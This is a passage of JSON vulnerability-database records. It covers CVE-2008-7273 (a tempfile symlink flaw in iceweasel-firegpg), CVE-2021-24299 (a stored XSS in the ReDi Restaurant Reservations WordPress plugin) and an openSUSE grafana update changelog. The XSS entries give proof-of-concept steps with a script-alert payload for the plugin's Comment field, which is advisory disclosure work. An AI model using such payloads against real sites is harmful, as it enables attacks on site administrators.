"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}], "wpvulndb": [{"id": "WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670", "hash": "55bc361e75ded44249699b0619a00971", "type": "wpvulndb", "bulletinFamily": "software", "title": "ReDi Restaurant Reservations < 21.0426 - Unauthenticated Stored Cross-Site Scripting (XSS)", "description": "The ReDi Restaurant Reservations plugin provides the functionality to let users make restaurant reservations. These reservations are stored and can be listed on an 'Upcoming' page provided by the plugin. An unauthenticated user can fill in the form to make a restaurant reservation. The form to make a restaurant reservation field called 'Comment' does not use proper input validation and can be used to store XSS payloads. The XSS payloads will be executed when the plugin user goes to the 'Upcoming' page, which is an external website https://upcoming.reservationdiary.eu/ loaded in an iframe, and the stored reservation with XSS payload is loaded.\n\n### PoC\n\nSteps to reproduce the vulnerability: 1\\. Install ReDi Restaurant Reservation 21.0307 and create a page with [redirestaurant] 2\\. Go to the page while being logged out of WordPress 3\\. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information 4\\. In the 'Comment' field put the following code: 5\\. Submit the form 6\\. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC) 7\\. Click on 'View upcoming reservations' 8\\. Select for 'Show reservations for': 'This week' 9\\. The reservations are loaded and two alerts are shown with text 'XSS'\n", "published": "2021-05-09T00:00:00", "modified": "2021-06-25T07:08:04", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://wpscan.com/vulnerability/fd6ce00b-8c5f-4180-b648-f47b37303670", "reporter": "Bastijn Ouwendijk", "references": ["https://packetstormsecurity.com/files/162756/", "https://bastijnouwendijk.com/cve-2021-24299/"], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-08-23T12:34:13", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-08-23T12:34:13", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2021-08-23T12:34:13", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "21.0426", "operator": "lt", "name": "redi-restaurant-reservation"}], "exploit": "Steps to reproduce the vulnerability:\r\n\r\n1. Install ReDi Restaurant Reservation 21.0307 and create a page with [redirestaurant]\r\n2. Go to the page while being logged out of WordPress \r\n3. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n4. In the 'Comment' field put the following code: <script>alert(\"XSS\")</script>\r\n5. Submit the form\r\n6. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n7. Click on 'View upcoming reservations'\r\n8. Select for 'Show reservations for': 'This week'\r\n9. The reservations are loaded and two alerts are shown with text 'XSS'", "sourceData": "", "generation": 1, "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"]}], "wpexploit": [{"id": "WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670", "hash": "40f1094dca44ae776c12d57540e1d2cd", "type": "wpexploit", "bulletinFamily": "exploit", "title": "ReDi Restaurant Reservations < 21.0426 - Unauthenticated Stored Cross-Site Scripting (XSS)", "description": "The ReDi Restaurant Reservations plugin provides the functionality to let users make restaurant reservations. These reservations are stored and can be listed on an 'Upcoming' page provided by the plugin. An unauthenticated user can fill in the form to make a restaurant reservation. The form to make a restaurant reservation field called 'Comment' does not use proper input validation and can be used to store XSS payloads. The XSS payloads will be executed when the plugin user goes to the 'Upcoming' page, which is an external website https://upcoming.reservationdiary.eu/ loaded in an iframe, and the stored reservation with XSS payload is loaded.\n", "published": "2021-05-09T00:00:00", "modified": "2021-06-25T07:08:04", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "", "reporter": "Bastijn Ouwendijk", "references": ["https://packetstormsecurity.com/files/162756/", "https://bastijnouwendijk.com/cve-2021-24299/"], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-08-23T12:34:13", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-08-23T12:34:13", "rev": 2}, "score": {"value": 4.2, "vector": "NONE", "modified": "2021-08-23T12:34:13", "rev": 2}}, "objectVersion": "1.6", "sourceData": "Steps to reproduce the vulnerability:\r\n\r\n1. Install ReDi Restaurant Reservation 21.0307 and create a page with [redirestaurant]\r\n2. Go to the page while being logged out of WordPress \r\n3. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n4. In the 'Comment' field put the following code: <script>alert(\"XSS\")</script>\r\n5. Submit the form\r\n6. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n7. Click on 'View upcoming reservations'\r\n8. Select for 'Show reservations for': 'This week'\r\n9. The reservations are loaded and two alerts are shown with text 'XSS'", "generation": 1, "_object_type": "robots.models.wpvulndb.WPExploitBulletin", "_object_types": ["robots.models.wpvulndb.WPExploitBulletin", "robots.models.base.Bulletin"]}], "suse": [{"id": "OPENSUSE-SU-2020:1646-1", "hash": "110f3e82d38379eb3090ef27b3d4905c", "type": "suse", "bulletinFamily": "unix", "title": "Security update for grafana (moderate)", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for grafana fixes the following issues:\n\n Update to version 7.1.5:\n\n * Features / Enhancements\n\n - Stats: Stop counting the same user multiple times.\n - Field overrides: Filter by field name using regex.\n - AzureMonitor: map more units.\n - Explore: Don't run queries on datasource change.\n - Graph: Support setting field unit & override data source (automatic)\n unit.\n - Explore: Unification of logs/metrics/traces user interface\n - Table: JSON Cell should try to convert strings to JSON\n - Variables: enables cancel for slow query variables queries.\n - TimeZone: unify the time zone pickers to one that can rule them all.\n - Search: support URL query params.\n - Grafana-UI: Add FileUpload.\n - TablePanel: Sort numbers correctly.\n\n * Bug fixes\n\n - Alerting: remove LongToWide call in alerting.\n - AzureMonitor: fix panic introduced in 7.1.4 when unit was unspecified\n and alias was used.\n - Variables: Fixes issue with All variable not being resolved.\n - Templating: Fixes so texts show in picker not the values.\n - Templating: Templating: Fix undefined result when using raw\n interpolation format\n - TextPanel: Fix content overflowing panel boundaries.\n - StatPanel: Fix stat panel display name not showing when explicitly set.\n - Query history: Fix search filtering if null value.\n - Flux: Ensure connections to InfluxDB are closed.\n - Dashboard: Fix for viewer can enter panel edit mode by modifying url\n (but cannot not save anything).\n - Prometheus: Fix prom links in mixed mode.\n - Sign In Use correct url for the Sign In button.\n - StatPanel: Fixes issue with name showing for single series / field\n results\n - BarGauge: Fix space bug in single series mode.\n - Auth: Fix POST request failures with anonymous access\n - Templating: Fix recursive loop of template variable queries when\n changing ad-hoc-variable\n - Templating: Fixed recursive queries triggered when switching dashboard\n settings view\n - GraphPanel: Fix annotations overflowing panels.\n - Prometheus: Fix performance issue in processing of histogram labels.\n - Datasources: Handle URL parsing error.\n - Security: Use Header.Set and Header.Del for X-Grafana-User header.\n\n Update to version 7.0.3\n\n * Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n - Variables: change VariableEditorList row action Icon to IconButton.\n #25217, @hshoff\n\n * Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317, @papagian\n - Configuration: Fix env var override of sections containing hyphen.\n #25178, @marefr\n - Dashboard: Get panels in collapsed rows. #25079, @peterholmberg\n - Do not show alerts tab when alerting is disabled. #25285, @dprokop\n - Jaeger: fixes cascader option label duration value. #25129, @Estrax\n - Transformations: Fixed Transform tab crash & no update after adding\n first transform. #25152, @torkelo\n\n Update to version 7.0.2\n\n * Bug fixes\n - Security: Urgent security patch release to fix CVE-2020-13379\n\n Update to version 7.0.1\n\n * Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query history more\n readable. #24795, @kaydelaney\n - Download CSV: Add date and time formatting. #24992, @ryantxu\n - Table: Make last cell value visible when right aligned. #24921,\n @peterholmberg\n - TablePanel: Adding sort order persistance. #24705, @torkelo\n - Transformations: Display correct field name when using reduce\n transformation. #25068, @peterholmberg\n - Transformations: Allow custom number input for binary operations.\n #24752, @ryantxu\n\n * Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not working. #24773,\n @KamalGalrani\n - Dashboard/Links: Fixes open in new window for dashboard link.\n #24772, @KamalGalrani\n - Dashboard/Links: Variables are resolved and limits to 100. #25076,\n @hugohaggmark\n - DataLinks: Bring back variables interpolation in title. #24970,\n @dprokop\n - Datasource/CloudWatch: Field suggestions no longer limited to\n prefix-only. #24855, @kaydelaney\n - Explore/Table: Keep existing field types if possible. #24944,\n @kaydelaney\n - Explore: Fix wrap lines toggle for results of queries with filter\n expression. #24915, @ivanahuckova\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n - Explore: fix word break in type head info. #25014, @zoltanbedi\n - Graph: Legend decimals now work as expected. #24931, @torkelo\n - LoginPage: Fix hover color for service buttons. #25009, @tskarhed\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n - MoveDashboard: Fix for moving dashboard caused all variables to be\n lost. #25005, @torkelo\n - Organize transformer: Use display name in field order comparer.\n #24984, @dprokop\n - Panel: shows correct panel menu items in view mode. #24912,\n @hugohaggmark\n - PanelEditor Fix missing labels and description if there is only\n single option in category. #24905, @dprokop\n - PanelEditor: Overrides name matcher still show all original field\n names even after Field default display name is specified. #24933,\n @torkelo\n - PanelInspector: Makes sure Data display options are visible. #24902,\n @hugohaggmark\n - PanelInspector: Hides unsupported data display options for Panel\n type. #24918, @hugohaggmark\n - PanelMenu: Make menu disappear on button press. #25015, @tskarhed\n - Postgres: Fix add button. #25087, @phemmer\n - Prometheus: Fix recording rules expansion. #24977, @ivanahuckova\n - Stackdriver: Fix creating Service Level Objectives (SLO) datasource\n query variable. #25023, @papagian\n\n Update to version 7.0.0\n\n * Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana v6.4 and\n starting from Grafana v7.0.0, all PhantomJS support has been\n removed. This means that Grafana no longer ships with a built-in\n image renderer, and we advise you to install the Grafana Image\n Renderer plugin.\n - Dashboard: A global minimum dashboard refresh interval is now\n enforced and defaults to 5 seconds.\n - Interval calculation: There is now a new option Max data points that\n controls the auto interval $__interval calculation. Interval was\n previously calculated by dividing the panel width by the time range.\n With the new max data points option it is now easy to set\n $__interval to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will dynamically\n set $__interval by dividing the current time range by 10.\n - Datasource/Loki: Support for deprecated Loki endpoints has been\n removed.\n - Backend plugins: Grafana now requires backend plugins to be signed,\n otherwise Grafana will not load/start them. This is an additional\n security measure to make sure backend plugin binaries and files\n haven't been tampered with. Refer to Upgrade Grafana for more\n information.\n - @grafana/ui: Forms migration notice, see @grafana/ui changelog\n - @grafana/ui: Select API change for creating custom values, see\n @grafana/ui changelog\n + Deprecation warnings\n - Scripted dashboards is now deprecated. The feature is not removed\n but will be in a future release. We hope to address the underlying\n requirement of dynamic dashboards in a different way. #24059\n - The unofficial first version of backend plugins together with\n usage of grafana/grafana-plugin-model is now deprecated and support for\n that will be removed in a future release. Please refer to backend plugins\n documentation for information about the new officially supported backend\n plugins.\n\n * Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the unofficial\n first version of backend plugins. #24675, @marefr\n - Editor: New line on Enter, run query on Shift+Enter. #24654, @davkal\n - Loki: Allow multiple derived fields with the same name. #24437,\n @aocenas\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n * Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to get directory.\n #24677, @zoltanbedi\n - Admin: Makes long settings values line break in settings page.\n #24559, @hugohaggmark\n - Dashboard: Allow editing provisioned dashboard JSON and add\n confirmation when JSON is copied to dashboard. #24680, @dprokop\n - Dashboard: Fix for strange \"dashboard not found\" errors when opening\n links in dashboard settings. #24416, @torkelo\n - Dashboard: Fix so default data source is selected when data source\n can't be found in panel editor. #24526, @mckn\n - Dashboard: Fixed issue changing a panel from transparent back to\n normal in panel editor. #24483, @torkelo\n - Dashboard: Make header names reflect the field name when exporting\n to CSV file from the the panel inspector. #24624, @peterholmberg\n - Dashboard: Make sure side pane is displayed with tabs by default in\n panel editor. #24636, @dprokop\n - Data source: Fix query/annotation help content formatting. #24687,\n @AgnesToulet\n - Data source: Fixes async mount errors. #24579, @Estrax\n - Data source: Fixes saving a data source without failure when URL\n doesn't specify a protocol. #24497, @aknuds1\n - Explore/Prometheus: Show results of instant queries only in table.\n #24508, @ivanahuckova\n - Explore: Fix rendering of react query editors. #24593, @ivanahuckova\n - Explore: Fixes loading more logs in logs context view. #24135,\n @Estrax\n - Graphite: Fix schema and dedupe strategy in rollup indicators for\n Metrictank queries. #24685, @torkelo\n - Graphite: Makes query annotations work again. #24556, @hugohaggmark\n - Logs: Clicking \"Load more\" from context overlay doesn't expand log\n row. #24299, @kaydelaney\n - Logs: Fix total bytes process calculation. #24691, @davkal\n - Org/user/team preferences: Fixes so UI Theme can be set back to\n Default. #24628, @AgnesToulet\n - Plugins: Fix manifest validation. #24573, @aknuds1\n - Provisioning: Use proxy as default access mode in provisioning.\n #24669, @bergquist\n - Search: Fix select item when pressing enter and Grafana is served\n using a sub path. #24634, @tskarhed\n - Search: Save folder expanded state. #24496, @Clarity-89\n - Security: Tag value sanitization fix in OpenTSDB data source.\n #24539, @rotemreiss\n - Table: Do not include angular options in options when switching from\n angular panel. #24684, @torkelo\n - Table: Fixed persisting column resize for time series fields.\n #24505, @torkelo\n - Table: Fixes Cannot read property subRows of null. #24578,\n @hugohaggmark\n - Time picker: Fixed so you can enter a relative range in the time\n picker without being converted to absolute range. #24534, @mckn\n - Transformations: Make transform dropdowns not cropped. #24615,\n @dprokop\n - Transformations: Sort order should be preserved as entered by user\n when using the reduce transformation. #24494, @hugohaggmark\n - Units: Adds scale symbol for currencies with suffixed symbol.\n #24678, @hugohaggmark\n - Variables: Fixes filtering options with more than 1000 entries.\n #24614, @hugohaggmark\n - Variables: Fixes so Textbox variables read value from url. #24623,\n @hugohaggmark\n - Zipkin: Fix error when span contains remoteEndpoint. #24524, @aocenas\n - SAML: Switch from email to login for user login attribute mapping\n (Enterprise)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2020-1646=1", "published": "2020-10-10T17:15:30", "modified": "2020-10-10T17:15:30", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ADIL6CL4DTCI65SMJ3I6RFDSF2HM5MXS/", "reporter": "Suse", "references": [], "cvelist": ["CVE-2020-12245", "CVE-2020-13379"], "immutableFields": [], "lastseen": "2021-10-24T14:27:34", "history": [], "viewCount": 86, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2020-13379", "UB:CVE-2020-12245"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-13379", "RH:CVE-2020-12245"]}, {"type": "cve", "idList": ["CVE-2020-12245", "CVE-2020-13379"]}, {"type": "attackerkb", "idList": ["AKB:72725B13-8444-4A5A-B4E8-71CF57FF5C25"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2020-12245/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-13379/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-12245/", "MSF:ILITIES/REDHAT_LINUX-CVE-2020-12245/"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-2641.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "CENTOS8_RHSA-2020-2641.NASL", "OPENSUSE-2020-1105.NASL", "REDHAT-RHSA-2020-5599.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "NEWSTART_CGSL_NS-SA-2021-0066_GRAFANA.NASL", "OPENSUSE-2020-892.NASL", "ORACLELINUX_ELSA-2020-4682.NASL", "CENTOS8_RHSA-2020-4682.NASL", "REDHAT-RHSA-2021-1518.NASL", "REDHAT-RHSA-2020-2861.NASL", "REDHAT-RHSA-2020-4682.NASL", "FEDORA_2020-E6E81A03D6.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-2676.NASL", "REDHAT-RHSA-2020-2796.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143778", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310877964"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1", "OPENSUSE-SU-2020:1611-1"]}, {"type": "redhat", "idList": ["RHSA-2020:2676", "RHSA-2020:2792", "RHSA-2020:2861", "RHSA-2020:2641", "RHSA-2020:4298", "RHSA-2020:5599", "RHSA-2021:0083", "RHSA-2021:1518", "RHSA-2020:4682", "RHSA-2020:2796"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158320"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5726", "ELSA-2020-4682", "ELSA-2020-2641"]}, {"type": "avleonov", "idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"]}, {"type": "exploitdb", "idList": ["EDB-ID:48638"]}, {"type": "zdt", "idList": ["1337DAY-ID-34640"]}, {"type": "fedora", "idList": ["FEDORA:77DCE3126D28", "FEDORA:6B2F331352FF"]}, {"type": "almalinux", "idList": ["ALSA-2020:4682"]}], "modified": "2021-10-24T14:27:34", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-10-24T14:27:34", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Backports SLE", "OSVersion": "15-SP2", "arch": "aarch64", "operator": "lt", 